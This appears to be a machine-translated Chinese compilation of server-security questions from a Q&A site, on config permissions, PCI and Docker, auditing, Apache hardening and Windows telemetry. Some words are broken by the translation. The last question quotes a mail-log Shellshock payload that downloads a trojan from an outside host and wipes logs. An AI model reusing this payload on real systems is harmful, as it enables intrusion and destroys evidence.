我已经阅读了很多关于保护您的服务器configuration文件最安全的方法的post和问题,其中包含敏感信息,如密码。 我迄今为止发现的三个主要build议是: 不要把你的敏感信息放在源代码pipe理中(OK) 将密码和其他凭据设置为环境variables(?) 确保包含这些variables的文件具有正确的权限,以便没有人可以读取它们(?) 我的部署是为服务器创build了一个普通用户(没有特殊权限),并且configuration文件位于其主目录中。 把这个文件的权限设置为600就足够了吗? chmod 600 ~/config ? 为什么我需要环境variables,因为它们无论如何都以纯文本forms存储在文件中? 有什么办法可以比这更安全吗?
我们在付款领域,我们在Docker中为了开发环境的目的而构build了很多我们的stream程。 现在,我们正考虑将Xen(HVM)场中的生产环境转换为Docker / LXC环境,以使两个环境保持同步。 有谁知道Docker如何影响PCI合规性? 我search了网页,但是找不到任何答案。 QSA似乎也很难在这个问题上,因为它是如此新。 任何人对此有任何意见?
Office 365是保持多台计算机和智能手机之间同步的便捷方式。 但是,对于合同中有义务保护客户数据和文件的情况,内幕威胁问题是一个非常真实的问题(例如HIPAA对健康相关数据的合规性,知识产权问题或敏感材料)。 任何人都可以指引我最近(去年之内)的白皮书或Office 365的testing结果反对在第三方或政府证人面前进行的正式STIG或类似的安全testing吗?
Redhat有这个支持安全修复的策略。 但是,当RHEL和CentOS站点被审计时,审计人员总是列出软件包版本或者询问ssh它的版本号是什么,然后他们让你失败,因为你看起来运行的是OpenSSH的易受攻击版本。 我能看到的唯一方法就是: 编译RHEL安全公告的列表,这大概会显示显然旧的rpm实际上是修补的。 我敢打赌,审计师实际上不会真正阅读。 只要安装一个新的包,即使它没有意义。 这比听起来要困难得多,因为开发人员的软件包不会有init.d脚本和其他集成。 而当你的远程访问方法时,OpenSSH很难安装在无人值守数据中心的顶部。 有更好的主意吗? 有一种叫做OVAL的东西。 Redhat至less用来提供这种格式的build议。 它是否真的在审计工作?
我很好奇,如果有人有任何想法,为什么当我运行who和who –all ,我仍然无法看到用户login下notty ? 见下文: [cbennett@lstn ~]$ who –all system boot 2016-04-25 09:20 run-level 3 2016-04-25 09:20 LOGIN ttyS0 2016-04-25 09:20 1997 id=tyS0 LOGIN tty1 2016-04-25 09:22 2281 id=tty1 pts/0 2016-04-25 10:30 2057 id=ts/0 term=0 exit=0 cbennett + pts/1 2016-04-25 09:28 05:13 2607 (redacted) kbennett + pts/8 2016-04-25 15:57 00:04 20513 (redacted) cbennett + pts/9 […]
现在有许多configurationpipe理软件select(Chef,Puppet,CFEngine,Ansible …),它们提供了一个在中央服务器上的存储库和使用TCP / IP与服务器通信的客户端的体系结构。 这种架构要求整个networking的客户端能够与服务器进行通信,并将服务器暴露给威胁,因为这是攻击者非常有希望的目标。 据我所知,所提到的工具具有使用私钥密码术对configuration项进行签名的能力。 但是签名密钥是服务器的密钥,它们存储在服务器上。 如果configurationpipe理服务器受到威胁,整个networking可能被认为是受到威胁的。 有没有一种方法可以避免服务器受到损害的风险=整个networking受到影响? 我想到的是在将configuration上传到服务器之前通过个人私钥对服务进行签名。 每个pipe理员都有他自己的。 任何常见的configurationpipe理解决scheme是否提供这样的function,或者是否有不同的方法来缓解上述风险?
简单地说,我正在CentOS 6上运行Apache 2.4.20,并且正在对此VM进行加固,然后再推出。 我添加了这一行: ServerTokens ProductOnly 哪一个在重启后立刻给了我这个回应: sudo service httpd start /usr/local/apache2/bin/apachectl: line 79: 7073 Segmentation fault (core dumped) $HTTPD -k $ARGV 我绝不是一种操作或者linuxtypes – 只是在组织发展的同时插入漏洞。 我尝试了其他可能的价值观,如主要工作正常: curl -I localhost HTTP/1.1 200 OK Date: Wed, 08 Jun 2016 13:28:37 GMT Server: Apache/2 X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=63072000; includeSubdomains; preload Last-Modified: Mon, 11 Jun 2007 18:53:14 GMT ETag: […]
在Windows 7上,我想通过使用包含的Windows审计function,对所有子文件夹和特定本地文件夹的文件执行审计。 当用户将文件从相同的NTFS卷移动到configuration了审核的文件夹时,由于NTFS移动/复制devisefunction/缺陷,文件不会inheritance审核设置( 如何解决NTFS移动/复制devise缺陷? )。 我已经configuration了MoveSecurityAttributes( https://support.microsoft.com/en-us/kb/310316 ),它解决了权限问题,但不是审核设置。 是否有与MoveSecurityAttributes类似的设置用于审计设置? 有没有办法强制所有子文件夹和文件的审计设置? 我知道有可能创build一个重置审计设置的脚本。 然而,该文件夹包含大约一百万个文件,并且在不使用时closures了电脑,所以它似乎不是一个实际的解决scheme。 而且它违反了总是让文件夹中的所有文件都被审核的目标。
我不需要任何Windows 10企业function,但企业是唯一(合法地)允许我closuresCEIP(客户体验改善计划)的企业; 这是将向MS发送可能包含我的一些客户数据的崩溃转储的组件。 尽pipeMS非常重视这些数据的隐私,但是我不能诚实地告诉我的客户他们的数据没有泄漏到我无法控制的地方。 是否有任何处理PII(个人身份信息)数据的组织部署Windows 10 Pro,如果有,他们如何减轻这种威胁?
昨天我收到一封邮件,发送邮件{@DOMAIN.ORG,邮件被标记为垃圾邮件。 正文包含脚本下载命令,如ftp://ftp.ugotownedz.org/upfile2.sh 来自syslog的行 Aug 14 19:25:00 hoeschen-vserv postfix/smtpd[20965]: connect from pacific1392.us.unmetered.com[209.239.123.82] Aug 14 19:25:01 hoeschen-vserv postfix/smtpd[20965]: 25B9ADC1075: client=pacific1392.us.unmetered.com[209.239.123.82] Aug 14 19:25:02 hoeschen-vserv postfix/cleanup[20969]: 25B9ADC1075: message-id=() { :; }; /bin/bash -c "mkdir /var/.udp; wget ftp://ftp.ugotownedz.org/Xorg -O … -rf /root/.bash_history; rm -rf /var/log/*" 事实上,这个非常简单的未encryption的shell脚本试图build立一个木马。 对我来说,这看起来很肮脏,并没有成功。 但无论如何,有什么我可以做的保护postfix反对这些types的黑客? 从脚本 … echo sshdo.ico >> /tmp/upfile for file in $(cat /tmp/upfile); […]